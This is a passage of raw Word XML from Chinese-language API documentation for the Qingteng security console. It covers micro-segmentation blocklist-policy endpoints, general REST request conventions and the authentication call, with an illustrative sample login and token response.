            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/black-strategy/list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6659E4C1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63C09487" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E0EDA01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建黑名单策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ACE45D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POST /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/black-strategy/create</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DBFF000" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21A99AEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02A955A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修改黑名单策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3546F208" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POST /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/black-strategy/update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33F27A90" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="476731B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CEA8A0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修改黑名单策略开关</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CBEEF63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POST /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/black-strategy/update-switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="53985028" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7854B8BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="653FD6A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>删除黑名单策略接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D1A4365" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>DELETE /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/black-strategy/delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74065D1F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1547FFE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0630ED94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>查看策略主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E170422" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>GET /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/black-strategy/strategy-host-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F8C11F2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="332F671F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C93E9A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>查看策略详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="117779E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>GET /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/black-strategy/detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B993CE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc115166078"/>
      <w:bookmarkStart w:id="8" w:name="请求方法"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>请求方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="30C1D7B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc115166079"/>
      <w:bookmarkStart w:id="10" w:name="基本请求方法"/>
      <w:r>
        <w:t>基本请求方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="177D35A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>所有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>都按照restful请求方式，返回结果都是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据格式。说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F83DC" w14:textId="13D5217E" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>为请求地址，对应的服务器地址为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006931B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>服务器地址，端口为80，如http://${server}:80/v1/api/auth；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF259FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>请求业务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>之前，需要经过认证请求；业务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>请求均需要经过参数签名，详细见下文的认证及签名说明；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B738BFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对于GET方式的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，参数统一放在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>中进行传递，参数使用page=1&amp;size=50&amp;sorts=id,-name&amp;key1=value1&amp;key2=value2的类似form表单的方式提交。注：sorts字段的约定不写表示升序，"-"表示降序，key1,key2为搜索的参数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE4898" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对于POST,PUT,DELETE的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，参数统一放在body中进行传递，必须设置Header：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ContentType:application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，返回数据为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>格式，各接口的返回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>详</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>见下文各接口说明；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C3C756" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc115166080"/>
      <w:bookmarkStart w:id="12" w:name="身份认证"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>身份认证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="5FC2F918" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>在请求业务API之前，需要经过身份验证，获取相关参数，通过后才能请求业务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DAF92A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
      <w:r>
        <w:t>POST /v1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/auth</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1172"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3612"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="023B972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C95AC3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24FD2376" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E46190C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52877825" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4322C368" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27AF3983" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="083E2113" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户名，为青藤console系统中的用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="095FFF06" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3218FDA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03C7E42F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2689A3DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42C74353" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716E9F31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "username": "zhangsan@qingteng.cn",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "password": "test1234"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDE050D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F748D14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "59080851823593e1a80b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzaWduS2V5IjoiZTAwMzU2NGUzMzliNGEwZjk5ODIxODJlNTg2NWUzYTciLCJjb21JZCI6IjU5MDgwODUxODIzNTkzZTFhODBiIiwidXVpZCI6IjU5MDgwODUxODIzNTkzZTFhODBiIiwiaWF0IjoxNTIyNjQzMjI4OTYyfQ.4koI1tlBZU5_ycpWENH3JyflDRYyUxeb70GdHjrjpYU",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "e003564e339b4a0f9982182e5865e3a7"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45550B70"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169"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3814"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="000613E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AA492FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46A7E2CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31B4CC15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69F4EBCF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04364955" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31A7EF23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>bool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="128DEE20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>认证是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A486D0B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74074827" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5667E5D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AE97C0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>错误码，认证失败时可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
